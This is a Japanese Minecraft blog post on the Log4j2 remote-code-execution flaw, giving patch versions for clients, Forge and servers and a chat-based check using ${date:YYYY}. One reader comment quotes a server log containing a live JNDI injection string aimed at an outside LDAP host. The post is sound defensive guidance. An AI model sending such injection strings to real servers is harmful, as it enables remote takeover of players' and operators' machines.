MENU

\ メニュー /

新着記事
サーバーの立て方
おすすめプラグイン
お役立ち情報
ブログ運営
プロフィール

\ おすすめレンタルサーバー /

ConoHa for GAME
XServer VPS
Agames

\ その他 /

X(旧Twitter)
YouTube
支援・ファンレターを送る
お問い合わせ
ブログランキング
ブログ村
揚げたてのポテト
初めまして、揚げたてのポテトといいます!
普段はYouTubeでマイクラ企画という様々な企画を配信しています。
良ければ参加よろしくお願いします!!
当サイトではマインクラフトに関連した記事を分かりやすくをモットーに書いていきます。
もっと見る
揚げポテユーザー交流Discordに参加する
Discordに参加するとなにかあるの?
  • 当サイトの新着記事の通知をいち早く受け取れる
  • ゲームに関する雑談や情報共有ができる
  • ゲームやサーバーでのお困りごとをQ&Aできる
  • サーバーの運営や参加者を募集できる
  • 専用のお問い合わせチャットを作成できる
初心者でも簡単にサーバーを作れる「ConoHa for GAME」がおすすめ!
  1. ホーム
  2. お役立ち情報
  3. 【マイクラ】Log4j2問題に関する対処方法のまとめ【バニラ/プラグイン/Forge対応】

【マイクラ】Log4j2問題に関する対処方法のまとめ【バニラ/プラグイン/Forge対応】

お役立ち情報
当記事にはアフィリエイト広告が含まれています。

2023年10月1日より施行された景品表示法の指定告示(通称:ステマ規制)によって、広告を掲載しているサイトやメディア、SNS内に、読者が認識できるような表記が必須となりました。

当サイトにおいても景品表示法に則り、冒頭に表記するようにしていますので、ご理解の上、ご覧いただけますと幸いです。

当記事にはアフィリエイト広告が含まれています。

2023年10月1日より施行された景品表示法の指定告示(通称:ステマ規制)によって、広告を掲載しているサイトやメディア、SNS内に、読者が認識できるような表記が必須となりました。

当サイトにおいても景品表示法に則り、冒頭に表記するようにしていますので、ご理解の上、ご覧いただけますと幸いです。

揚げたてのポテト

こんにちわ、揚げたてのポテトです。

ポテコちゃん

どうもー!助手のポテ子ちゃんです!

揚げたてのポテト

先日、Log4j2の脆弱性に関する問題が話題になりましたね。

ポテコちゃん

え!?そうなの?初耳なんだけど…

揚げたてのポテト

マイクラにも大きく関わる問題なので、確認しながら見ていきましょう。今回はよく分からない人のために対応方法をまとめてみました。

当記事では、Log4j2の脆弱性に関する問題でマインクラフトでの対応方法をまとめた記事になります。

この記事を書いた人

揚げたてのポテト

  • 当サイト「揚げポテほかほかクラフト」の管理人
  • Minecraft歴10年以上|サーバー運用10年以上
  • 見やすく、分かりやすくを心掛けて書いています。
目次

Log4j2問題って何?

ポテコちゃん

ところでLog4j2問題ってどんなの?

マインクラフトでは、「Log4j2」というログを出力するプログラムが使われています。

今回、このLog4j2にて重大な脆弱性が発見されたため、大きく話題になりました。

脆弱性とは、プログラムの不具合や設計上のミスが原因となって発生したセキュリティ上の欠陥のこと

2021年12月10日にMinecraftの関連団体よりクライアント及びサーバーに関する重大な脆弱性が見つかったとの警告が発表されました。

マインクラフトでは、この脆弱性を悪用することで、任意のリモートコードを実行できてしまう例が報告されています。

要するに任意のコードを実行させると最悪パソコン操作もできてしまうという重大な問題です。

そのため、マインクラフトではこの問題に対応するべく、クライアント側やサーバー側で対処する必要があります。

このLog4j2問題はほぼ全てのバージョン、全プレイヤーが対象となるので必ず対処する必要があります。

公式クライアントの対処方法

公式クライアント(公式ランチャー)では、2021年12月10日以降よりLog4j2問題に対するパッチ(修正プログラム)が更新されました。

このパッチは、公式ランチャーを起動すれば自動的にパッチが適用されるのでクライアント側の対処方法はこれで完了です。

そのため、以前と同じく好きなバージョンで遊ぶことができるようになりました。

【追記】新ランチャーや旧ランチャーでも対応しているとのこと

あわせて読みたい
【マイクラ】新ランチャーへのアップグレード方法【新ランチャー】 どうもこんにちわ、揚げたてのポテトです。 2021年11月2日よりマイクラランチャーのアップグレードが表示されるようになりました。本日はマイクラランチャーのアップグ…

Forgeクライアントの対応方法

次にMODで遊ぶ際に主にForgeを導入してプレイすると思います。

その時に公式クライアントではなく、Forgeクライアントになるので上記の対策が適用されません。

そのため、Forgeをダウンロードするときにパッチが適用されたForgeをダウンロードする必要があります。

揚げたてのポテト

以下にバージョンごとにまとめたので参考にしてください。

  • 1.18.1以降:最初からパッチ適用
  • 1.18:バージョン38.0.17以降よりパッチ適用
  • 1.17.1:バージョン37.1.1以降よりパッチ適用
  • 1.16.5:バージョン36.2.20以降よりパッチ適用
  • 1.15.2:バージョン31.2.57以降よりパッチ適用
  • 1.14.4:バージョン28.2.25以降よりパッチ適用
  • 1.13.2:バージョン25.0.222以降よりパッチ適用
  • 1.12.2:バージョン2-14.23.5.2857以降よりパッチ適用
  • 1.11.2以下のバージョンは現時点ではパッチはありません。

サーバー側の対処方法

マイクラサーバーでは、バニラサーバーやプラグインサーバー、MODサーバーによってそれぞれ対処方法が異なりますので、注意してください。

バージョン1.18.1以降は既にパッチが適用されているので特に対処する必要はありません。

Minecraft Realmsも既にパッチが適用されています。

\当サイトが厳選したゲーム向けレンタルサーバー/

スクロールできます
ConoHa for GAME公式サイトのトップページ
ConoHa for GAME
解説ページへ		マイクラサーバーを契約するだけですぐ遊べる
当サイト限定で700円分クーポンがもらえる!
国内トップの知名度だから安心して使える

4GBプラン:月額1,445円/8GBプラン:月額2,590円
※上記料金は割引キャンペーン適用済み(1月10日まで)
ロリポップ! for Gamers公式サイトのトップページ
ロリポップ! for Gamers
解説ページへ		 マイクラサーバーがたった3ステップですぐ遊べる
お手頃価格だから高スペックでも長期で利用できる
国内トップ級のサーバー高性能&高速回線を採用

4GBプラン:月額1,500円/8GBプラン:月額3,000円
全プラン1,500円引きクーポンコード:2024-winter
※クーポンキャンペーンは12月31日まで(詳しくはこちら
Xserver VPS公式サイトのトップページ
Xserver VPS
解説ページへ		 マイクラサーバーを契約するだけですぐ遊べる
国内トップ級のサーバー高性能&高速回線を採用
初めての方でも直感的な操作で分かりやすい

4GBプラン:月額2,200円/8GBプラン:月額4,400円

レンタルサーバーはこんな人におすすめ!

「パソコンの性能(スペック)が足りない」

「ポート開放が上手くできない」

「難しくてよく分からない」

揚げたてのポテト

当サイトでは、上記のレンタルサーバーを徹底解説しているので初めての方でも分かりやすいと好評です!

脆弱性の確認方法

きちんと対策できているか不安の方は以下のコードをマイクラチャットで実行して確認することができます。

${date:YYYY}

上記のコマンドを「/(スラッシュ)」入れずにそのまま送信してください。

この時に「2022」(現在の西暦)と表示されなければ対策できています。

最後に

取り急ぎまとめた記事なので説明不足な部分もあるかと思いますが、改めて追記や修正を行いたいと思います。

Log4j2の脆弱性は大変危険な問題です。

サーバー運営してる人やマルチプレイで良く遊ぶ人は必ず対処を行いましょう!

揚げたてのポテト

最後まで読んでいただきありがとうございました。
次回の記事でお会いしましょう!

4.4 23 総投票数
\ この記事を評価 /

当サイトはリンクフリーです。SNSやブログ等でご紹介いただけると嬉しいです。

\当サイトが厳選したゲーム向けレンタルサーバー/

スクロールできます
ConoHa for GAME公式サイトのトップページ
ConoHa for GAME
解説ページへ		マイクラサーバーを契約するだけですぐ遊べる
当サイト限定で700円分クーポンがもらえる!
国内トップの知名度だから安心して使える

4GBプラン:月額1,445円/8GBプラン:月額2,590円
※上記料金は割引キャンペーン適用済み(1月10日まで)
ロリポップ! for Gamers公式サイトのトップページ
ロリポップ! for Gamers
解説ページへ		 マイクラサーバーがたった3ステップですぐ遊べる
お手頃価格だから高スペックでも長期で利用できる
国内トップ級のサーバー高性能&高速回線を採用

4GBプラン:月額1,500円/8GBプラン:月額3,000円
全プラン1,500円引きクーポンコード:2024-winter
※クーポンキャンペーンは12月31日まで(詳しくはこちら
Xserver VPS公式サイトのトップページ
Xserver VPS
解説ページへ		 マイクラサーバーを契約するだけですぐ遊べる
国内トップ級のサーバー高性能&高速回線を採用
初めての方でも直感的な操作で分かりやすい

4GBプラン:月額2,200円/8GBプラン:月額4,400円
お役立ち情報

この記事が気に入ったら
フォローしてね!

この記事をシェアする
  • URLをコピーしました!

この記事を書いた人

揚げたてのポテトのアバター 揚げたてのポテト マイクラ大好き

当サイトでは、マインクラフトに関連した記事を誰が見ても分かりやすくをモットーに書いています。開設して6年目にして累計来場者数が200万人を突破しました!沢山の方にご覧いただき感謝です!

また、YouTubeにてマイクラ企画というコンテンツを配信しています。
視聴者参加型なので良ければ参加よろしくお願いします!!

4.4 23 総投票数
\ この記事を評価 /
guest
25 件のコメント
インラインフィードバック
すべてのコメントを表示
けむろろ

更新の止まった古いプラグインって使ってても大丈夫ですかね?

0
0
返信
返信を表示 (1)
Towa

PaperMCver1.16未満は
パッチが適用されていないそうですが
PaperMCでLog4j2の
対策をする方法は無いのですか?

0
0
返信
返信を表示 (1)
いつきさん

1.18.1-39.0.0でConohaでForgeサーバーをたててます、1日立てっぱなしにしてたら [User Authenticator #2/INFO]: UUID of player FermatSleep is xxxxxx
[01:13:20] [Server thread/INFO]: Using new advancement loading for net.minecraft.server.PlayerAdvancements@3xxxxx
[01:13:20] [Server thread/INFO]: FermatSleep[/xxxxx] logged in with entity id 3512 at (xxxxxx)
[01:13:20] [Server thread/INFO]: FermatSleep joined the game
[01:13:21] [Server thread/INFO]: ${jndi:ldap://185.233.105.120:1389/a}
[01:13:22] [Server thread/INFO]: FermatSleep lost connection: Disconnected
[01:13:22] [Server thread/INFO]: FermatSleep left the game

みたいなログが残ってました。log4j?かなにかをされたと思うのですが具体的に何をされたか、何かされていた場合どう対処すればいいかわかりませんか?( ; ; )

0
0
返信
返信を表示 (3)
mumei

現在1.16.5のmod入りサーバーで遊んでいます。
ランチャーとforgeを最新のものに更新し、公式のJVM引数もコピペ済みなのですが、アップデートなど行われていないMODを入れるのは避けるべきでしょうか?

0
0
返信
返信を表示 (2)
M

mohistはもうパッチきましたか?

1
0
返信
返信を表示 (2)
1 2
目次